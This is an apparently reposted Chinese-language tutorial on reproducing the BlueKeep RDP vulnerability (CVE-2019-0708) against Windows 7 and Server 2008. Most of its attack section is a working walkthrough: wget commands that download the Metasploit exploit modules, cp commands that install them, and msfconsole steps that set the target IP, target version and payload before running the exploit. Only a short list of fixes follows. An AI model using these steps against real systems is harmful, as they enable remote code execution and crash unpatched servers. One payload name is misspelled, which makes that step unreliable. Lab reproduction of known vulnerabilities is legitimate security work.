安基网 首页 资讯 安全报 查看内容

安全漏洞利用与防范集锦--让对方系统蓝屏漏洞CVE 2019-0708详解

2019-9-11 01:44| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 漏洞背景:Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。漏洞危害:CVE-2019-0708 漏 ...

漏洞背景:

Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。

2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。

漏洞危害:

CVE-2019-0708 漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过 rdp 协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器被黑客入侵、感染病毒,像WannaCry永恒之蓝一样大规模的感染。

漏洞影响范围:

该漏洞影响范围较广,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系统都会遭到攻击。

漏洞复现环境准备:

CVE 2019-0708的exploit地址:

https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0

ruby脚本地址:

https://github.com/rapid7/metasploit-framework/pull/12283/files

wget下载:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

复制到KALl MSF中

rdp.rb

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cve_2019_0708_bluekeep.rb

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

rdp_scanner.rb

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cve_2019_0708_bluekeep_rce.rb

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

开始复现:

攻击命令

使用msfconsole

进入后使用reload_all重新加载模块

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

使用info查看工具相关信息以及设置

set RHOSTS 设置IP

set RPORT 设置RDP端口号

使用set target ID设置受害机机器

使用payload设置攻击载荷

使用exploit开始攻击,等待建立连接

Step1.打开kali,下载4个模块

Step2. 复制到MSF文件中

如果出现无法找到rdp目录,用mkdir创建一个目录,运行文章上的4个复制命令到msf文件夹中。

Step3.运行msfconsole,重新加载模块,use连接模块

输入”msfconsole”启动msf,然后输入” reload_all”重新加载模块

进入msf后,输入search 0708 搜索攻击模块。(小技巧:直接use 编号 就能连接)

连接编号为3的攻击模块cve_2019_0708_bluekeep_rce

命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

当连接攻击模块后查看攻击设置命令: show options

RHOSTS=目标

RPORT=端口

Target: 目标版本对应的id

提示:

Target 1 =Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

Target2= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)

Target3=Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)

Target4= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

设置目标ip:set RHOSTS 192.168.1.192(测试机器ip 目标为:win7)

设置攻击版本: set target 3 (目标机器在vm上测试的)

重要一点:set payload windows/x64/shell_bitcp设置攻击载荷(不设置情况可能攻击失败)

设置好目标ip以及targer运行:exploit 开始攻击

经过测试发现会导致大部分机器蓝屏,因为发布的exp为阉割版,所以大家请谨慎测试。

修复方案

1、最简便的方法就是安装一个安全管家,比如火绒、360之类的

2、把系统的自动更新打开或者到微软官网下载补丁

3、设置防火墙规则,并关闭3389端口



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6734618757924127240/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部